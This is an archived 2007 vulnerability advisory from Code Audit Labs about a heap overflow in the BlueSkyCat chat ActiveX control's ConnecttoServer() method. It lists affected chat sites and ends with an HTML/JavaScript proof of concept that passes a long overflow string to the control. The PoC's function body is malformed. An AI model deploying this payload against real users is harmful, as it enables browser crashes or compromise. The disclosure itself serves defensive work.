|
|||||||||||
|
CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability
From: Code Audit Labs <vulnhunt(at)gmail.com>
Date: Mon Jul 30 2007 - 20:36:11 EDT CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability BACKGROUND: BlueSkychat is a professional voice and video chat software widely used by large chat websites in china. DESCRIPTION: Code Audit Labs Code Audit for BlueSkyCat ActiveX Control and discovered a vulnerability .
Remote exploitation of a buffer overflow in an ActiveX control
distributed
When Blueskychat are installed, they register the following ActiveX control on the system:
ProgId: V2.V2Ctrl.1
This control contains a buffer overflow in its ConnecttoServer() method. This is a clent side vulnerability. So the clients of following chat servers which install the affected BlueSkyCat software are affected. bliao http://www.bliao.com qqliao http://www.qqliao.com 7liao http://www.7liao.com haoliao http://www.haoliao.net 51liao http://chat.51liao.net heshang http://www.heshang.net xicn http://vchat.xicn.net CN104 http://www.cn104.com liao-tian http://www.liao-tian.com aliao http://www.aliao.net kuailiao http://www.kuailiao.com mtliao http://www.mtliao.com pj0427 http://www.pj0427.com uighur http://chat.uighur.cn wmliao http://www.wmliao.com CVE: We request a CVE number to assign to this vulnerability. Affected version: v2.ocx version 8.1.2.0 and prior vendor: BlueSky http://www.bluesky.cn/ POC: <html> <head> <OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}"> </OBJECT> </head> <body> <SCRIPT language="javascript">
function ClickForRunCalc()
var heapSprayToAddress = 0x0d0d0d0d;
var payLoadCode = "A" ;
while (payLoadCode.length <= 10000) payLoadCode+='A';
com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script> <button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button> </body> </html> Code Audit Labs Suggestion for vendor: Do a full coverage Code Audit or Code Review
for client:
DISCLOSURE TIMELINE:
About Us: Code Audit Labs secure your software,provide Professional include source code audit and binary code audit service. Code Audit Labs:" You create value for customer,We protect your value" http://www.VulnHunt.com Original LINK:
1:
EOF -- Code Audit Labs http://www.vulnhunt.com/Received on Tue Jul 31 12:17:45 2007 This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:10:35 EDT |
||||||||||
|
|||||||||||